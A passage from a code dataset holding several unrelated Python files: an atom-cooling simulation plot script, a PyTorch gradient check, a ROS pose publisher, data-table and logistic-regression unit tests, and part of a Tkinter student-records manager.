V[:,0])[0])\n\n#print(int(vVv1v),vVv2v,vVv3v)\ncol=[]\n\n\nfor i in range(vVv1v):\n col.append(Cfast)\nfor j in range(vVv1v,vVv2v):\n col.append(Cfastm)\nfor k in range(vVv2v,vVv3v):\n col.append(Cslowm)\nfor l in range(vVv3v,Natoms):\n col.append(Cslow)\nprint(len(col))\nfor i in range(Natoms):\n 'A plot for each of the Natoms particles'\n th = 0.4\n ax1.plot(Z[i],Y[i],linewidth=th, color = col[i])\n ax2.plot(Z[i],V[i],linewidth=th, color = col[i])\nprint(len(V[4]))\n\nax1.axhspan(-0.01,0.01, alpha=0.05, color='green')\nax1.axvspan(z0-0.01,z0+0.01, alpha=0.05, color='purple')\nax1.axvline(x = z0 - aa, color = 'k', linestyle='dotted')\nax1.axvline(x = z0, color = 'k', linestyle='dashed')\nax1.axvline(x = z0-0.01, color = 'k',linewidth=1.3)\nax1.axvline(x = z0+0.01, color = 'k',linewidth=1.3)\nax1.axhline(y = Col_Gap/2, color = 'k',linewidth=1.3)\nax1.axhline(y = -Col_Gap/2, color = 'k',linewidth=1.3)\nax2.set_ylim(top=1.5*ymot, bottom=-1.5*ymot)\n\nax2.axvspan(z0-0.01,z0+0.01, alpha=0.05, color='purple')\n#ax2.axhspan(-capV,capV, alpha=0.05, color='b')\nax2.axhspan(-capv,capv, alpha=0.05, color='red')\nax2.axvline(x = z0 - aa, color = 'k', linestyle='dotted')\nax2.axvline(x = z0, color = 'k', linestyle='dashed')\nax2.axvline(x = z0-0.01, color = 'k',linewidth=1.3)\nax2.axvline(x = z0+0.01, color = 'k',linewidth=1.3)\nax2.axhline(y = capv, color = 'k',linewidth=1.3)\nax2.axhline(y = -capv, color = 'k',linewidth=1.3)\n\nax2.set_ylim(top=1.7*Vmp, bottom=-20)\n\n#ax1.subplots_adjust(hspace=0) # Makes the plots that share the \n# # same x axis on top of each other\nax1.set_ylabel(\"y coordinate / m\", size = 15)\nax2.set_ylabel(\"Speed / ms`'\", size = 11)\nax1.set_title('Multi-Frequency: Sim-ya-lator Simulator', size=31)\nax5.set_xlabel('Distance / m (0 = atom source)', size = 15)\nax5.set_ylabel('Spatial Desity @ v=0',size=11)\n#ax1.set_yticks(np.arange(-0.002, 0.002, step=0.0005))\nfrom datetime import date\ntoday = date.today()\nd4 = today.strftime(\"%d-%b-%Y\")\n\nstop = timeit.default_timer()\nIrE = c*8.85e-12/2*E0**2/10000 # Intensity (This /10000 makes it W/cm^2)\n\nprint('Run Time =',round(stop - start, 3),'sec')\nprint(np.sum(Jsum))\nSTR = '{}mW/cm2 [{}] \\n{}MHz =RF \\n{}MHz =AOM \\n{} =Beta [{}]\\n{}% Captured\\n[{}/{}]\\n {} {}s' \niSTR = STR.format(round(IrE,3)*1000, E0, RF/1000000, (AOM)/1000000, Beta, round(np.sum(Jsum),4), round(N0/Natoms,3)*100, N0,Natoms,d4,round(stop - start, 3))\nax2.text(z0*0.4, 230, iSTR,fontsize=18, bbox = dict(boxstyle='round', fc=(0.0,0.0,0.0), alpha=0.2))\n # # # # # # # # # # # # # # # # # # # \n''' Velocity class tracking '''\nv_ = np.linspace(0,1000,1000)\ndef dv_(v_,F,D):\n Lambda=2*pi*c/F\n k = 2*pi/Lambda\n 'Incremental Acceleration'\n O = F/(2*pi*c)\n c1 =1+II[i]+4*D**2/G**2\n c2 = O*8/G**2*D\n c3 = 4*O**2/G**2 \n rhoaa = -II[i]**2/(c1+c2*v_+c3*v_**2) + II[i]**2/(c1-c2*v_+c3*v_**2) \n return rhoaa*hbar*k*G/M\n\n\nS,Ss,Vv=[],[],[] \nfor i in range(L):#reshaped Force(v) \n S.append(dv_(v_,Fplot[i],D[i]))\nS = np.reshape(S,(len(Fplot),len(v_)))\nfor i in range(L):#max indexes\n Sim = np.argmax(S[i])\n Ss = np.append(Ss,Sim)\nfor i in range(L):#indexing velocity\n Vv.append(v_[int(Ss[i])])\nfor i in range(L):\n ax2.axhline(Vv[i],c='brown', linewidth=1.7, alpha=0.34)\nstop = timeit.default_timer()\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n''' V=0 density curve '''\n # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n'''\nBinV=[]\nV0s = []\nfor j in range(Natoms): \n inx = (np.abs(V[j]-0)).argmin()\n # print(inx,Z[j][inx])\n V0s.append(Z[j][inx])\n#print(V0s)\n \nBinFactor = 4\nBins = np.linspace(0,2.5*z0,int(Natoms/BinFactor)) # Bins # Bins # Bins # Bins # Bins # Bins # Bins # Bins # Bins #\nprint(Bins)\nHis =np.histogram(V0s,bins=Bins)[0]\nprint('His',His,len(His))\n\nBplot = []\nfor i in range(len(Bins)-1):\n Bplot.append((Bins[i]+Bins[1+i])/2)\n#print('b',Bplot)\nax5.plot(Bplot,His,linewidth=4,color='turquoise')\nax5.fill_between(Bplot,His,0,alpha=0.5,color='turquoise')\n \n# Hpeak[0,1]=value, index\nHpeak = [max(His), int(round( np.median(np.where(His==max(His))) ))]\n\nLmin = max(np.where(His[:Hpeak[1]] == min(His[:Hpeak[1]] ) )[0])\n\nLmax = max(np.where(His[Hpeak[1]:] == min(His[Hpeak[1]:] ) )[0])\n\n#vLmin,vLmax = BinFactor* IS IT POSSIBLE TO CONVERT INTO ORGINAL VELOCITY = not needed right now\nFWi = Lmax-Lmin\n\nBot = max(His[Lmax],His[Lmin])\n\n#print(Bot)\nHM = Bot + (Hpeak[0]+Bot)/2\n\n\nlHM = np.abs(His[:Hpeak[1]]-HM).argmin()\nrHM = np.abs(His[Hpeak[1]:]-HM).argmin()+Hpeak[1]\nprint(lHM,rHM)\n#print(lHM,rHM)\nSkew = -1*(Bplot[Hpeak[1]]-Bplot[lHM]-Bplot[rHM]+Bplot[Hpeak[1]])\nprint('Skew =',Skew,' +=MB')\nFWHM = Bplot[rHM]-Bplot[lHM]\nprint('FWHM =', FWHM)\n\nax5.axhline(y=Hpeak[0],c='k',linewidth=0.4)\nax5.axhline(y=Bot,c='dimgrey',linewidth=0.4)\nax5.axvline(x=Bplot[lHM],c='k',linewidth=0.4)\nax5.axvline(x=Bplot[rHM],c='k',linewidth=0.4)\nStrd = 'FWHM = {}mm\\n÷Cloud Diam = {}\\n[Skew = {}]'\nStrD = Strd.format(round(FWHM,2)*1000,round(FWHM/ymot,4),round(Skew,4)) \nax5.text(0.01,2,StrD,fontsize=16)\nax2.set_xlim(left=0, right=3*z0)\n#print('# Particles = {}'.format(Natoms))\n#print('Beam Intensity = {}W/cm^2'.format(round(IrE, 3)))\n#print('Run Time =',round(stop - start, 3),'sec')\nprint('(',E0,AOM,RF,Beta,')',d4)\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n# APPENDING DISTDENS TO A FILE TO BE USED LATER B First \n\nimport winsound\nfrequency = 2300 # Set Frequency To 2500 Hertz\nduration = 1300 # Set Duration To 1000 ms == 1 second\nwinsound.Beep(frequency, duration)\n\nimport csv\n\nwith open('EOM_Beta_data{}.csv'.format(int(Beta*10)),'w',newline='') as f:#\n Wri = csv.writer(f)\n Wri.writerow(['Bplot,His,w/ Beta=','{}'.format(Beta)])\n for i in range(len(Bplot)):\n Wri.writerow(['{}'.format(Bplot[i]),'{}'.format(His[i]) ])\n'''\nplt.show()","sub_path":"Simulation/VisualS/EOM/Sim_Ya_Lator Simulator.py","file_name":"Sim_Ya_Lator Simulator.py","file_ext":"py","file_size_in_byte":20229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"143607301","text":"import torch\nfrom torch.autograd import Variable\nfrom gcn.functions import GOF_Function, my_GOF_Function\nfrom torch.autograd import gradcheck\n\ndef cpu_gpu_check():\n gof = GOF_Function.apply\n # gof = my_GOF_Function()\n\n weight = torch.rand(2,2,4,3,3).double()\n gfb = torch.rand(4,3,3).double()\n\n weight_cpu = Variable(weight, requires_grad=True)\n weight_gpu = Variable(weight.cuda(), requires_grad=True)\n\n gfb_cpu = Variable(gfb, requires_grad=False)\n gfb_gpu = Variable(gfb.cuda(), requires_grad=False)\n\n # Forward results checking...\n print('-'*80)\n output_cpu = gof(weight_cpu, gfb_cpu)\n output_gpu = gof(weight_gpu, gfb_gpu)\n if torch.equal(output_cpu, output_gpu.cpu()):\n print(\"Forward results do agree!\")\n else:\n print(\"Forward results do not agree!\")\n print('Results on cpu:', output_cpu)\n print('Results on gpu:', output_gpu)\n \n # Backward results checking...\n print('-'*80)\n output_cpu.backward(torch.ones(output_cpu.size()).double())\n output_gpu.backward(torch.ones(output_gpu.size()).double().cuda())\n if torch.equal(weight_cpu.grad, weight_gpu.grad.cpu()):\n print(\"Backward grads do agree!\")\n else:\n print(\"Backward grads do not agree!\")\n print('Grad on cpu:', weight_cpu.grad)\n print('Grad on gpu:', weight_gpu.grad)\n\n # Gradcheck on cpu\n print('-'*80)\n print('Gradcheck on cpu:')\n inputs_cpu = (weight_cpu, gfb_cpu)\n test_cpu = gradcheck(gof, inputs_cpu, eps=1e-6, atol=1e-4, rtol=1e-3, raise_exception=True)\n print(test_cpu)\n\n # Gradcheck on gpu\n print('-'*80)\n print('Gradcheck on gpu:')\n inputs_gpu = (weight_gpu, gfb_gpu)\n test_gpu = gradcheck(gof, inputs_gpu, eps=1e-6, atol=1e-4, rtol=1e-3, raise_exception=True)\n print(test_gpu)\n\nif __name__ == \"__main__\":\n cpu_gpu_check()","sub_path":"gcn/functions/gradtest.py","file_name":"gradtest.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"632539792","text":"#!/usr/bin/env python\n# license removed for brevity\nimport rospy\nimport sys\nimport tf\nimport time\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import PoseStamped\nfrom geometry_msgs.msg import PoseWithCovarianceStamped\n\ndef plot_out(args):\n #time.sleep(10)\n rospy.init_node('portable_plot_out', anonymous=True)\n start_position_pub = rospy.Publisher('start_position', PoseWithCovarianceStamped, queue_size=10)\n goal_position_pub = rospy.Publisher('goal_position', PoseStamped, queue_size=10)\n detect_position_pub = rospy.Publisher('detect_position', PoseStamped, queue_size=10)\n\n if args[7] == 'start':\n rospy.loginfo(args[8] + \"_start_position plotout\")\n tmp_pose = PoseWithCovarianceStamped()\n num = 0\n r = rospy.Rate(5) # 10hz\n while num < 3:\n now = rospy.Time.now()\n tmp_pose.header.stamp = now\n tmp_pose.header.frame_id = args[8]\n tmp_pose.pose.pose.position.x = float(args[1]);\n tmp_pose.pose.pose.position.y = float(args[2]);\n tmp_pose.pose.pose.position.z = float(args[3]);\n quat = tf.transformations.quaternion_from_euler(float(args[6]), float(args[5]), float(args[4]))\n tmp_pose.pose.pose.orientation.x = quat[0];\n tmp_pose.pose.pose.orientation.y = quat[1];\n tmp_pose.pose.pose.orientation.z = quat[2];\n tmp_pose.pose.pose.orientation.w = quat[3];\n start_position_pub.publish(tmp_pose)\n num += 1\n r.sleep()\n\n elif args[7] == 'goal':\n rospy.loginfo(args[8] + \"_goal_position plotout\")\n tmp_pose = PoseStamped()\n num = 0\n r = rospy.Rate(5) # 10hz\n while num < 3:\n now = rospy.Time.now()\n tmp_pose.header.stamp = now\n tmp_pose.header.frame_id = args[8]\n tmp_pose.pose.position.x = float(args[1])\n tmp_pose.pose.position.y = float(args[2])\n tmp_pose.pose.position.z = float(args[3])\n quat = tf.transformations.quaternion_from_euler(float(args[6]), float(args[5]), float(args[4]))\n tmp_pose.pose.orientation.x = quat[0]\n tmp_pose.pose.orientation.y = quat[1]\n tmp_pose.pose.orientation.z = quat[2]\n tmp_pose.pose.orientation.w = quat[3]\n goal_position_pub.publish(tmp_pose)\n num += 1\n r.sleep()\n\n elif args[7] == 'detect':\n rospy.loginfo(args[8] + \"_detect_position plotout\")\n tmp_pose = PoseStamped()\n num = 0\n r = rospy.Rate(5) # 10hz\n while num < 3:\n now = rospy.Time.now()\n tmp_pose.header.stamp = now\n tmp_pose.header.frame_id = args[8]\n tmp_pose.pose.position.x = float(args[1])\n tmp_pose.pose.position.y = float(args[2])\n tmp_pose.pose.position.z = float(args[3])\n quat = tf.transformations.quaternion_from_euler(float(args[6]), float(args[5]), float(args[4]))\n tmp_pose.pose.orientation.x = quat[0]\n tmp_pose.pose.orientation.y = quat[1]\n tmp_pose.pose.orientation.z = quat[2]\n tmp_pose.pose.orientation.w = quat[3]\n detect_position_pub.publish(tmp_pose)\n num += 1\n r.sleep()\n\nif __name__ == '__main__':\n try:\n plot_out(sys.argv)\n except rospy.ROSInterruptException: pass\n","sub_path":"tms_rc/tms_rc_pot/scripts/portable_plotout.py","file_name":"portable_plotout.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"308109341","text":"# -*- coding: us-ascii -*-\n\"\"\"Unit and regression tests for the statcode5 module.\"\"\"\n\nfrom __future__ import unicode_literals\n\nfrom StringIO import StringIO\n\nfrom pyAirviro.other.datatable import DataTable\nfrom pyAirviro.other.exceptions import DataTableException\nimport pyAirviro.tests\n\n\nDATATABLE = \"\"\"\\\n#semicolon separated datatable content\n#with header without units\nint1;int2;str3;float4;float5;str6\n1;2;test1;3.14;4.323;hej\n1;2;test2;-3.234;4.323;hopp\n2;2;test3;4.323;3e-12;hej\n\"\"\"\n\nDATATABLE_WITH_UNITS = \"\"\"\\\n#semicolon separated datatable content\n#with header without units\nint1 [unit1];int2 [unit2];str3;float4 [unit4];float5 [unit5];str6\n1;2;test1;3.14;4.323;hej\n1;2;test2;-3.234;4.323;hopp\n2;2;test3;4.323;3e-12;hej\n\"\"\"\n\nSMALL_DATATABLE = \"\"\"\\\nc1;c2\n1;2\n2;3\n3;4\n\"\"\"\n\n\nclass DataTableTests(pyAirviro.tests.TestCase):\n\n \"\"\"Unit and regression tests for the DataTable class.\"\"\"\n\n def test_read_data_table(self):\n stream = StringIO(DATATABLE)\n table = DataTable()\n table.read(stream, delimiter=\";\")\n self.assertEqual(table.listIds(),\n ['int1', 'int2', 'str3', 'float4', 'float5', 'str6'])\n self.assertEqual(table.colIndex['float5'], 4)\n\n def test_read_data_table_with_units(self):\n stream = StringIO(DATATABLE_WITH_UNITS)\n table = DataTable()\n table.read(stream, delimiter=\";\", units=True, unitDelimiter='[]')\n self.assertEqual(table.desc[3]['units'], 'unit4')\n self.assertTrue('units' not in table.desc[2])\n\n def test_look_up(self):\n stream = StringIO(DATATABLE)\n table = DataTable()\n table.read(stream, delimiter=\";\")\n table.setKeys(['int1', 'int2'])\n self.assertEqual(table.lookup('str3', ['2', '2']), 'test3')\n\n def test_convert_type(self):\n stream = StringIO(DATATABLE)\n table = DataTable()\n table.read(stream, delimiter=\";\")\n table.setKeys(['int1', 'int2'])\n table.convertCol('int1', int)\n table.convertCol('float4', float)\n self.assertEquals(table.lookup('float4', [2, '2']), 4.323)\n\n def test_accumulate(self):\n stream = StringIO(DATATABLE)\n table = DataTable()\n table.read(stream, delimiter=\";\")\n table.setKeys(['int1', 'int2'])\n table.convertCol('int1', int)\n table.convertCol('int2', int)\n table.convertCol('float4', float)\n matchingRows = table.rowIndices([1, 2])\n accumulated = sum(\n [table.data[row_index][table.colIndex['float4']]\n for row_index in matchingRows])\n row = table.accumulate([1, 2], method='sum', colIds=['float4'])\n self.assertEqual(row[table.colIndex['float4']], accumulated)\n self.assertEquals(table.lookup('float4', [2, 2]), 4.323)\n\n def test_filtered(self):\n stream = StringIO(DATATABLE)\n table = DataTable()\n table.read(stream, delimiter=\";\")\n filtered_table = table.filtered({'str6': 'hej'})\n self.assertEqual(filtered_table.data[-1][0], '2')\n\n def test_write(self):\n stream = StringIO(DATATABLE)\n table = DataTable()\n table.read(stream, delimiter=\";\")\n outstream = StringIO()\n table.write(outstream, delimiter=';')\n outstream.seek(0)\n table2 = DataTable()\n table2.read(outstream, delimiter=';')\n for rownr, row in enumerate(table.data):\n self.assertEqual(row, table2.data[rownr])\n\n def test_add_row(self):\n stream = StringIO(DATATABLE)\n table = DataTable()\n table.read(stream, delimiter=\";\")\n table.convertCol('float4', float)\n table.convertCol('float5', float)\n table.addRow(['4', '5', 'test4', 34.2, 23.0, 'hopp'])\n self.assertEqual(table.ncols, 6)\n\n self.assertRaises(DataTableException, table.addRow,\n [4, '5', 'test4', 34.2, 23, 'hopp'])\n\n def test_add_col_remove_col(self):\n stream = StringIO(DATATABLE)\n table = DataTable()\n table.read(stream, delimiter=\";\")\n table.addCol({'id': 'newCol1', 'type': int}, 1)\n table.addCol({'id': 'newCol2', 'type': int}, range(table.nrows))\n table.addCol({'id': 'newCol3', 'type': int})\n self.assertEqual(table.ncols, 9)\n self.assertRaises(DataTableException, table.addRow,\n [4, '5', 'test4', 34.2, 23, 'hopp'])\n table.setKeys(['int1', 'int2'])\n self.assertEqual(table.lookup('newCol1', ['2', '2']), 1)\n self.assertEqual(table.lookup('newCol2', ['2', '2']), 2)\n self.assertTrue(table.lookup('newCol3', ['2', '2']) is None)\n self.assertEqual(table.ncols, 9)\n table.removeCols(['newCol1'])\n self.assertEqual(table.ncols, 8)\n\n def test_sort_rows(self):\n stream = StringIO(DATATABLE)\n desc = [{'id': 'int1', 'type': int},\n {'id': 'int2', 'type': int},\n {'id': 'str3', 'type': unicode},\n {'id': 'float4', 'type': float}]\n table = DataTable(desc=desc)\n table.read(stream, delimiter=\";\")\n table.sortRows(order_by=['float4', 'int1'])\n self.assertEquals(table.data[0][3], -3.234)\n\n def test_join(self):\n stream1 = StringIO(DATATABLE)\n stream2 = StringIO(SMALL_DATATABLE)\n table1 = DataTable()\n table1.read(stream1, delimiter=\";\")\n table2 = DataTable()\n table2.read(stream2, delimiter=\";\")\n table2.setKeys(['c1'])\n table1.join(table2, keyMap={'c1': 'int1'}, addCols=['c2'])\n table1.setKeys(['int1'])\n self.assertEqual(table1.lookup('c2', ['1']), '2')\n","sub_path":"pyAirviro/tests/other/test_datatable.py","file_name":"test_datatable.py","file_ext":"py","file_size_in_byte":5624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"262862960","text":"__author__ = 'chaomai'\n\nimport unittest\nimport csv\nimport LogisticRegression as lr\n\n\nclass LogisticRegressionTestCase(unittest.TestCase):\n def getData(self):\n samples = []\n labels = []\n with open('data.txt', mode='r') as dataFile:\n reader = csv.reader(dataFile, delimiter=',', lineterminator='\\n')\n for r in reader:\n labels.append(r.pop(len(r) - 1))\n samples.append(r)\n\n return samples, labels\n\n def testTrain(self):\n samples, labels = self.getData()\n l = lr.LogisticRegression()\n l.train(samples, labels)\n\n def testPredict(self):\n samples, labels = self.getData()\n l = lr.LogisticRegression()\n l.train(samples, labels)\n p = l.predict(samples)\n print(p)\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"StatisticalLearning/LogisticRegression/LogisticRegressionUnitTest.py","file_name":"LogisticRegressionUnitTest.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"116223397","text":"import io\nimport pickle\nimport time\nfrom tkinter import *\nfrom tkinter import simpledialog, ttk, messagebox\n\nfrom Student import *\n\nxueji = []\n\ndef test(a):\n print(a)\n\ndef file_new():\n xj = open('学生管理系统/xueji.stu','wb')\n pickle.dump(xueji,xj)\n xj.close\n \ndef file_read():\n global xueji\n try:\n xj = open('学生管理系统/xueji.stu','rb')\n xueji = pickle.load(xj)\n xj.close()\n return 1\n except:\n return 0\n\ndef file_save():\n xj = open('学生管理系统/xueji.stu','wb')\n pickle.dump(xueji,xj)\n xj.close\n\ndef star():\n z = file_read()\n if z == 0:\n file_new()\n print('学籍文件无法读取,已新建!')\n elif z == 1:\n print('初始化完成')\n\ndef add(id,name,gender,discipline,home,phonenumber):\n global xueji\n id = id\n name = name\n gender = gender\n discipline = discipline\n home = home\n phonenumber = phonenumber\n new = Student(id = id,name = name,gender = gender,discipline = discipline,home = home,phonenumber = phonenumber)\n xueji.append(new)\n file_save()\n\ndef score_input():\n global xueji\n id = input('请输入学生学号:')\n z = 0\n for i in range(len(xueji)):\n if xueji[i].id() == id:\n z = 1\n print('学号:',xueji[i].id(),'姓名:',xueji[i].name(),'性别:',xueji[i].gender())\n y = input('请确认信息:(y/n)')\n while y != 'y' and y != 'n':\n y = input('输入有误,请重新输入!')\n if y == 'y':\n score = eval(input('请输入该学生的分数:'))\n xueji[i].score_input(score)\n file_save()\n print('录入成功!\\n''学号:',xueji[i].id(),'姓名:',xueji[i].name(),'性别:',xueji[i].gender(),'成绩:',xueji[i].score())\n elif y == 'n':\n print('已取消')\n if z == 0:\n print('查无此人!')\n\ndef colorreturn():\n b1.config(bg = 'white')\n b2.config(bg = 'white')\n b3.config(bg = 'white')\n b4.config(bg = 'white')\n\ndef changeto_b1():\n global r1c1\n def delete(id):\n if messagebox.askyesno('敏感操作!','确认删除此学生吗?'):\n for i in range(len(xueji)):\n if xueji[i].id() == id:\n del xueji[i]\n file_save()\n add_all()\n\n def menu(event):\n if len(list1.selection()) == 1:\n menubar.post(event.x_root,event.y_root)\n elif len(list1.selection()) > 1:\n menubar.entryconfig('修改',state = DISABLED)\n menubar.post(event.x_root,event.y_root)\n\n def seach(choose,seach):\n clear()\n if choose == 0:\n for i in range(len(xueji)):\n if xueji[i].id() == seach:\n list1.insert('',0,values = (xueji[i].id(),xueji[i].name(),xueji[i].gender(),xueji[i].discipline(),xueji[i].phonenumber(),xueji[i].home()))\n elif choose == 1:\n for i in range(len(xueji)):\n if xueji[i].name() == seach:\n list1.insert('',0,values = (xueji[i].id(),xueji[i].name(),xueji[i].gender(),xueji[i].discipline(),xueji[i].phonenumber(),xueji[i].home()))\n elif choose == 2:\n for i in range(len(xueji)):\n if xueji[i].name()[0] == seach:\n list1.insert('',0,values = (xueji[i].id(),xueji[i].name(),xueji[i].gender(),xueji[i].discipline(),xueji[i].phonenumber(),xueji[i].home()))\n\n def add_all():\n clear()\n for i in range(len(xueji)):\n list1.insert('',0,values = (xueji[i].id(),xueji[i].name(),xueji[i].gender(),xueji[i].discipline(),xueji[i].phonenumber(),xueji[i].home()))\n\n def clear():\n x = list1.get_children()\n for i in x:\n list1.delete(i)\n\n def namechange():\n newname = simpledialog.askstring('修改名字','新名字:')\n if newname != None:\n for i in range(len(xueji)):\n if xueji[i].id() == list1.item(list1.selection(),\"values\")[0]:\n xueji[i].name_change(newname)\n file_save()\n add_all()\n\n def disciplinehange1(newname,top):\n if newname != '':\n for i in range(len(xueji)):\n if xueji[i].id() == list1.item(list1.selection(),\"values\")[0]:\n xueji[i].discipline_change(newname)\n file_save()\n add_all()\n top.destroy()\n\n def disciplinechange():\n top = Tk()\n top.title('修改专业')\n x = top.winfo_width()\n y = top.winfo_height()\n weizhi = '+%d+%d' % ((pmx-x)/2,(pmy-y)/2)\n top.geometry(weizhi)\n\n home = ttk.Combobox(top,width = 18)\n home.grid(row = 0,column = 0,padx = 2)\n home['value'] = ('计算机科学与技术','物理学','经济学','生物学')\n Button(top,text = '确认',command = lambda:disciplinehange1(home.get(),top)).grid(row = 0,column = 1,padx = 2)\n\n top.mainloop()\n\n def phonenumberchange():\n newname = simpledialog.askinteger('修改电话号码','新电话号码:')\n if newname != None:\n for i in range(len(xueji)):\n if xueji[i].id() == list1.item(list1.selection(),\"values\")[0]:\n xueji[i].phonenumber_change(newname)\n file_save()\n add_all()\n\n def homechange1(newname,top):\n if newname != '':\n for i in range(len(xueji)):\n if xueji[i].id() == list1.item(list1.selection(),\"values\")[0]:\n xueji[i].home_change(newname)\n file_save()\n add_all()\n top.destroy()\n\n def homechange():\n top = Tk()\n top.title('修改生源地')\n x = top.winfo_width()\n y = top.winfo_height()\n weizhi = '+%d+%d' % ((pmx-x)/2,(pmy-y)/2)\n top.geometry(weizhi)\n\n home = ttk.Combobox(top,width = 18)\n home.grid(row = 0,column = 0,padx = 2)\n home['value'] = ('北���市','天津市','上海市','重庆市','河北省','山西省','辽宁省','吉林省','黑龙江省','江苏省','浙江省','安徽省','福建省','江西省','山东省','河南省','湖北省','湖南省','广东省','海南省','四川省','贵州省','云南省','陕西省','甘肃省','青海省','台湾省','内蒙古自治区','广西壮族自治区','西藏自治区','宁夏回族自治区','新疆维吾尔自治区','香港特别行政区','澳门特别行政区')\n Button(top,text = '确认',command = lambda:homechange1(home.get(),top)).grid(row = 0,column = 1,padx = 2)\n\n top.mainloop()\n\n\n r1c1.destroy()\n r1c1 = Frame(row1,bg = 'RoyalBlue',width = 750,height = 494)\n r1c1.grid(row = 0,column = 1,sticky = N)\n r1c1.grid_propagate(0)\n colorreturn()\n b1.config(bg = 'RoyalBlue')\n #row1\n r1c1_up = Frame(r1c1,bg = 'RoyalBlue')\n r1c1_up.grid(row = 0,column = 0,sticky = W)\n r1c1_dumn = Frame(r1c1,bg = 'RoyalBlue')\n r1c1_dumn.grid(row = 1,column = 0)\n\n #r1c1_up\n seachentry = Entry(r1c1_up)\n seachentry.grid(row = 0,column = 0,padx = 44)\n choose = ttk.Combobox(r1c1_up)\n choose.grid(row = 0,column = 1,sticky = W,padx = 0)\n choose['value'] = ('学号','姓名','姓氏')\n choose.current(0)\n Button(r1c1_up,text = '搜索',command = lambda:seach(choose.current(),seachentry.get())).grid(row = 0,column = 2,sticky = W,padx = 40,pady = 7)\n Button(r1c1_up,text = '撤销搜索',command = add_all).grid(row = 0,column = 3,sticky = W,padx = 0,pady = 7)\n\n #r1c1_dumn\n list1 = ttk.Treeview(r1c1_dumn,show = 'headings',column = ['学号','姓名','性别','专业','电话','生源地'],height = 21)\n list1.column('学号',width = 100,anchor = CENTER)\n list1.column('姓名',width = 100,anchor = CENTER)\n list1.column('性别',width = 100,anchor = CENTER)\n list1.column('专业',width = 120,anchor = CENTER)\n list1.column('电话',width = 100,anchor = CENTER)\n list1.column('生源地',width = 120,anchor = CENTER)\n list1.heading('学号',text = '学号')\n list1.heading('姓名',text = '姓名')\n list1.heading('性别',text = '性别')\n list1.heading('专业',text = '专业')\n list1.heading('电话',text = '电话')\n list1.heading('生源地',text = '生源地')\n for i in range(len(xueji)):\n list1.insert('',0,values = (xueji[i].id(),xueji[i].name(),xueji[i].gender(),xueji[i].discipline(),xueji[i].phonenumber(),xueji[i].home()))\n list1.pack(padx = 44)\n\n menubar = Menu(list1,tearoff = 0)\n\n menubar1 = Menu(menubar,tearoff = 0)\n if identity == 'admin':\n menubar1.add_command(label = '名字',command = namechange)\n menubar1.add_command(label = '专业',command = disciplinechange)\n menubar1.add_command(label = '电话',command = phonenumberchange)\n menubar1.add_command(label = '生源地',command = homechange)\n else:\n menubar1.add_command(label = '电话',command = phonenumberchange)\n\n menubar.add_cascade(label = '修改',menu = menubar1)\n if identity == 'admin':\n menubar.add_command(label = '删除',command = lambda:delete(list1.item(list1.selection(),\"values\")[0]))\n \n list1.bind('',menu)\n\ndef changeto_b2():\n global r1c1\n def menu(event):\n if identity == 'admin':\n if len(list2.selection()) == 1:\n menubar.post(event.x_root,event.y_root)\n elif len(list2.selection()) > 1:\n menubar.entryconfig('修改',state = DISABLED)\n menubar.post(event.x_root,event.y_root)\n\n def seach(choose,seach):\n clear()\n if choose == 0:\n for i in range(len(xueji)):\n if xueji[i].id() == seach:\n list2.insert('',0,values = (xueji[i].id(),xueji[i].name(),xueji[i].discipline(),xueji[i].chinesescore(),xueji[i].mathscore(),xueji[i].englishscore(),xueji[i].physicsscore()))\n elif choose == 1:\n for i in range(len(xueji)):\n if xueji[i].name() == seach:\n list2.insert('',0,values = (xueji[i].id(),xueji[i].name(),xueji[i].discipline(),xueji[i].chinesescore(),xueji[i].mathscore(),xueji[i].englishscore(),xueji[i].physicsscore()))\n elif choose == 2:\n for i in range(len(xueji)):\n if xueji[i].discipline() == seach:\n list2.insert('',0,values = (xueji[i].id(),xueji[i].name(),xueji[i].discipline(),xueji[i].chinesescore(),xueji[i].mathscore(),xueji[i].englishscore(),xueji[i].physicsscore()))\n\n def add_all():\n clear()\n for i in range(len(xueji)):\n list2.insert('',0,values = (xueji[i].id(),xueji[i].name(),xueji[i].discipline(),xueji[i].chinesescore(),xueji[i].mathscore(),xueji[i].englishscore(),xueji[i].physicsscore()))\n\n def clear():\n x = list2.get_children()\n for i in x:\n list2.delete(i)\n\n def chinesechange():\n newname = simpledialog.askinteger('修改分数','修改为:',minvalue = 0,maxvalue = 100)\n if newname != None:\n for i in range(len(xueji)):\n if xueji[i].id() == list2.item(list2.selection(),\"values\")[0]:\n xueji[i].chinesescore_change(newname)\n file_save()\n add_all()\n\n def mathchange():\n newname = simpledialog.askinteger('修改分数','修改为:',minvalue = 0,maxvalue = 100)\n if newname != None:\n for i in range(len(xueji)):\n if xueji[i].id() == list2.item(list2.selection(),\"values\")[0]:\n xueji[i].mathscore_change(newname)\n file_save()\n add_all()\n\n def englishchange():\n newname = simpledialog.askinteger('修改分数','修改为:',minvalue = 0,maxvalue = 100)\n if newname != None:\n for i in range(len(xueji)):\n if xueji[i].id() == list2.item(list2.selection(),\"values\")[0]:\n xueji[i].englishscore_change(newname)\n file_save()\n add_all()\n\n def physicschange():\n newname = simpledialog.askinteger('修改分数','修改为:',minvalue = 0,maxvalue = 100)\n if newname != None:\n for i in range(len(xueji)):\n if xueji[i].id() == list2.item(list2.selection(),\"values\")[0]:\n xueji[i].physicsscore_change(newname)\n file_save()\n add_all()\n\n r1c1.destroy()\n #row1\n r1c1 = Frame(row1,bg = 'RoyalBlue',width = 750,height = 494)\n r1c1.grid(row = 0,column = 1,sticky = N)\n r1c1.grid_propagate(0)\n colorreturn()\n\n #r1c1\n r1c1_up = Frame(r1c1,bg = 